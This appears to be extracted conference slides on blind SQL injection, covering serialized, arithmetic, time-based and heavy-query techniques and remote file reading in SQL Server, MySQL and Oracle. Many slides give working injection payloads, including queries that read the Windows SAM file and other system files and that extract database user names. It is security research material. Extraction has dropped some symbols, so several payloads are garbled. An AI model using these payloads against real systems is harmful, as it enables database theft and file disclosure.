Re Playing with Blind SQL Injection

1
(Re) Playing with (Blind) SQL Injection

• José Palazón Palako
• Mobile Security at Yahoo!
• Chema Alonso
• Informatica64
• Microsoft MVP Enterprise Security

2
Spain (not only bulls)
3
SQL Injection attacks
A long time ago, in a galaxy far, far away
http//www.phrack.org/issues.html?id8issue54
4
Agenda

• Serialized SQL Injection
• Demo XML Extractor
• Arithmetic SQL Injection
• Divide by Zero
• Sums and subtractions
• Type oveflow
• Demo
• Remote File Downloading using Blind SQL Injection
• SQL Sever
• MySQL
• Oracle
• Demo RFD Tool
• Time-Based Blind SQL Injection using heavy
  queries
• Demo Marathon Tool

5
Serialized SQL Injection
6
Serialized SQL Injection

• Goal To Merge complex resultsets in a single
  showable field
• XML serialization functions allow to convert a
  resultset into a one XML string.
• Its possible to download big amount of data with
  single and simple injections.

7
SQL Server

• FOR XML Retrieves data as a single string
  representing an XML tree.
• RAW Mandatory option. Shows the information
  converting each row of the result set in an XML
  element in the form ltrow /gt.
• BINARY BASE64 The query will fail if we find any
  BINARY data type column (containing images, or
  passwords) if this option is not explicitly
  specified.
• union select '1','2','3',(select from sysusers
  for xml raw, binary base64)
• XMLSCHEMA obtains the whole table structure,
  including the data types, column names and other
  constraints.
• Described by Dani Kachakil

8
MySQL

• No default XML support, requires a server side
  extension
• GROUP_CONCAT (v 4.1)

9
Oracle

• xmlforest, xmlelement,
• No support

10
Demo Serialized SQL Injection
11
Arithmetic Blind SQL Injection
12
Blind Attacks

• Attacker injects code but cant access directly
  to the data.
• However this injection changes the behavior of
  the web application.
• Then the attacker looks for differences between
  true code injections (11) and false code
  injections (12) in the response pages to extract
  data.
• Blind SQL Injection
• Biind Xpath Injection
• Blind LDAP Injection

13
Blind SQL Injection Attacks

• Attacker injects
• True where clauses
• False where clauses
• Ex
• Program.php?id1 and 11
• Program.php?id1 and 12
• Program doesnt return any visible data from
  database or data in error messages.
• The attacker cant see any data extracted from
  the database.

14
Blind SQL Injection Attacks

• Attacker analyzes the response pages looking for
  differences between True-Answer Page and
  False-Answer Page
• Different hashes
• Different html structure
• Different patterns (keywords)
• Different linear ASCII sums
• Different behavior
• By example Response Time

15
Blind SQL Injection Attacks

• If any difference exists, then
• Attacker can extract all information from
  database
• How? Using booleanization
• MySQL
• Program.php?id1 and 100gt(ASCII(Substring(user(),1
  ,1)))
• True-Answer Page or False-Answer Page?
• MSSQL
• Program.php?id1 and 100gt(Select top 1
  ASCII(Substring(name,1,1))) from sysusers)
• Oracle
• Program.php?id1 and 100gt(Select
  ASCII(Substr(username,1,1))) from all_users where
  rownumlt1)

16
Arithmetic Blind SQL Injection

• The query force the parameter to be numeric
• SELECT field FROM table WHERE idabs(param)
• Boolean logic is created with math operations
• Divide by zero
• Sums and subtractions
• Type overflows

17
Arithmetic Blind SQL Injection

• Divide by zero (David Litchfield)
• IdA(1/(ASCII(B)-C))
• A-gt Param value originally used in the query.
• B -gt Value we are searching for, e.g.
  Substring(passwd,1,1)
• C-gt Counter 0..255
• When ASCII(B)C, the DB will generate a divide by
  zero exception.

18
Arithmetic Blind SQL Injection

• Sums and subtractions
• IdAASCII(B)-C
• A-gt Param value originally used in the query.
• B -gt Value we are searching for, e.g.
  Substring(passwd,1,1)
• C-gt Counter 0..255
• When ASCII(B)C, then the response page of
  idAASCII(B)-C will be the same as idA

19
Arithmetic Blind SQL Injection

• Value type overflow
• IdA((C/ASCII(B))(K))
• A-gt Param value originally used in the query.
• B -gt Value we are searching for, e.g.
  Substring(passwd,1,1)
• C-gt Counter 0..255
• K-gt Value that overflows the type defined for A
• (e.g. if A is integer, then K232)
• When C/ASCII(B)1, K1 overflows the data type

20
Demo

• Divide by zero
• Sums and subtractions
• Integer overflow

21
Remote File Downloading using Blind SQL Injection
techniques
22
Accessing Files

• Two ways
• Load the file in a temp table
• and igt(select top 1 ASCII(Substring(column)(file,p
  os,1)) from temp_table ??
• Load the file in the query
• With every query the file is loaded in memory
• I am very sorry, engine ?
• and igtASCII(Substring(load_file(file,pos,1))??

23
SQL Server 2K - External Data Sources

• Only for known filetypes
• Access trough Drivers Txt, csv, xls, mdb, log
• And 200gtASCII (SUBSTRING(SELECT FROM
  OPENROWSET('MSDASQL', 'Driver Microsoft Text
  Driver (.txt .csv)DefaultDirC\','select
  top 1 from c\dir\target.txt),1,1))
• Privileges
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\
  Providers\DisallowAdhocAccess0
• By default this key doesnt exist so only users
  with Server Admin Role can use these functions.
• NTFS permissions

24
SQL Server 2K Bulk option

• Access to any file
• Create Table TempTable as (row varchar(8000))
  --
• Bulk Insert TempTable From 'c\file.ext' With
  (FIELDTERMINATOR '\n', ROWTERMINATOR '\n) --
  
• alter table TempTable add num int
  IDENTITY(1,1) NOT NULL
• and (select COUNT(row) from TempTable)
• and (select top 1 len(row) from TempTable where
  num rownum)
• and (select top 1 ASCII(SUBSTRING(row,1,1)) from
  TempTable where num 1)
• Drop Table TempTable--
• Privileges needed
• Server Role Bulkadmin
• Database Role db_owner o db_ddladmin
• NTFS permissions

25
SQL Server 2k5 2k8

• OPENDATASOURCE and OPENROWSET supported
• Bulk options improved
• AND 256 gt ASCII(SUBSTRING ((SELECT FROM
  OPENROWSET(BULK 'c\windows\repair\sam',
  SINGLE_BLOB) As Data), 1, 1))
• Permisions
• Bulkadmin Server Role
• External Data Sources enabled
• Sp_configure
• Surface configuration Tool for features

26
MySQL

• LoadFile
• SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
• SQLbfTools MySQLget command (illo and dab)
• http//www.reversing.org/node/view/11
• Load Data infile
• Create table C8DFC643 (datos varchar(4000))
• Load data infile 'c\\boot.ini' into table
  C8DFC643
• alter table C8DFC643 add column num integer
  auto_increment unique key
• and (select count(num) from C8DFC643)
• and (select length(datos) from C8DFC643 where num
  1)
• and (select ASCII(substring(datos,5,1)) from
  C8DFC643 where num 1)
• Drop table C8DFC643

27
Oracle Plain Text files

• External Tables
• execute immediate 'Create Directory A4A9308C As
  ''c\'' ' end --
• execute immediate 'Create table A737D141 (
  datos varchar2(4000) ) organization external
  (TYPE ORACLE_LOADER default directory A4A9308C
  access parameters ( records delimited by newline
  ) location (''boot.ini''))' end--
• Only Plain Text files

28
Oracle DBMS_LOB

• execute immediate
• DECLARE l_bfile BFILE
• l_blob BLOB
• BEGIN INSERT INTO A737D141 (datos) VALUES
  (EMPTY_BLOB()) RETURN datos INTO l_blob
• l_bfile BFILENAME(''A4A9308C'',
  ''Picture.bmp'')
• DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly)
  
• DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getl
  ength(l_bfile))
• DBMS_LOB.fileclose(l_bfile)
• COMMIT
• EXCEPTION
• WHEN OTHERS THEN ROLLBACK
• END
• end --

29
Demo RFD
30
Time-based Blind SQL Injection using heavy queries
31
Time-Based Blind SQL Injection

• In scenarios with no differences between
  True-Answer Page and False-Answer Page, time
  delays can be used.
• Injection forces a delay in the response page
  when the condition injected is True.
• - Delay functions
• SQL Server waitfor
• Oracle dbms_lock.sleep
• MySQL sleep or Benchmark Function
• Postgres pg_sleep
• Ex
• if (exists(select from users)) waitfor delay
  '005

32
Exploit for Solar Empire Web Game
33
Deep Blind SQL Injection

• Time delay depends on the wanted value.
• E.g. a-gt10s. delay, b-gt11s. Delay,
• http//labs.portcullis.co.uk/application/deep-blin
  d-sql-injection/

34
Time-Based Blind SQL Injection

• What about databases engines without delay
  functions, i.e., MS Access, Oracle connection
  without PL/SQL support, DB2, etc?
• Can we still perform an exploitation of
  Time-Based Blind SQL Injection Attacks?

35
Yes, we can!
36
Where-Clause execution order

• Select whatever
• From whatever
• Where condition1 and condition2
• - Condition1 lasts 10 seconds
• - Condition2 lasts 100 seconds
• Which condition should be executed first?

37
The heavy condition first
38
The light condition first
39
Time-Based Blind SQL Injectionusing Heavy Queries

• Attacker can perform an exploitation delaying the
  True-answer page using a heavy query.
• It depends on how the database engine evaluates
  the where clauses in the query.
• There are two types of database engines
• Databases without optimization process
• Databases with optimization process

40
Time-Based Blind SQL Injectionusing Heavy Queries

• Attacker could inject a heavy Cross-Join
  condition for delaying the response page in
  True-Injections.
• The Cross-join injection must be heavier than the
  other condition.
• Attacker only have to know or to guess the name
  of a table with select permission in the
  database.
• Example in MSSQL
• Program.php?id1 and (SELECT count() FROM
  sysusers AS sys1, sysusers as sys2, sysusers as
  sys3, sysusers AS sys4, sysusers AS sys5,
  sysusers AS sys6, sysusers AS sys7, sysusers AS
  sys8)gt1 and 300gt(select top 1 ascii(substring(name
  ,1,1)) from sysusers)

41
Default tables to construct a heavy query

• Microsoft SQL Server
• sysusers
• Oracle
• all_users
• MySQL (versión 5)
• information_schema.columns
• Microsoft Access
• MSysAccessObjects (97 2000 versions)
• MSysAccessStorage (2003 2007)

42
Default tables to construct a heavy query

• or whatever you can guess
• Clients
• Customers
• News
• Logins
• Users
• Providers
• .Use your imagination

43
Ex 1 MS SQL Server

• Query lasts 14 seconds -gt True-Answer

44
Ex 1 MS SQL Server

• Query lasts 1 second -gt False-Answer

45
Ex 2 Oracle

• Query Lasts 22 seconds gt True-Answer

46
Ex 2 Oracle

• Query Lasts 1 second gt False-Answer

47
Ex 3 Access 2000

• Query Lasts 6 seconds gt True-Answer

48
Ex 3 Access 2000

• Query Lasts 1 second gt False-Answer

49
Ex 4 Access 2007

• Query Lasts 39 seconds gt True-Answer

50
Ex 4 Access 2007

• Query Lasts 1 second gt False-Answer

51
Marathon Tool

• Automates Time-Based Blind SQL Injection Attacks
  using Heavy Queries in SQL Server, MySQL, MS
  Access and Oracle Databases.
• Schema Extraction from known databases
• Extract data using heavy queries not matter in
  which database engine (without schema)
• Developed in .NET
• Source code available

52
Demo Marathon Tool
53
Prevention Dont forget Bobby
Tables!SANITIZE YOUR QUERIES!
54
Preguntas?

• Speakers
• Chema Alonso (chema_at_informatica64.com)
• Palako (palako_at_lateatral.com)
• Autores
• Chema Alonso (chema_at_informatica64.com)
• Alejandro Martín (amartin_at_informatica64.com)
• Antonio Guzmán (aguzman_at_urjc.es)
• Daniel Kachakil (dani_at_kachakil.org)
• José Palazón Palako (palako_at_lateatral.com)
• Marta Beltran (mberltran_at_urjc.es)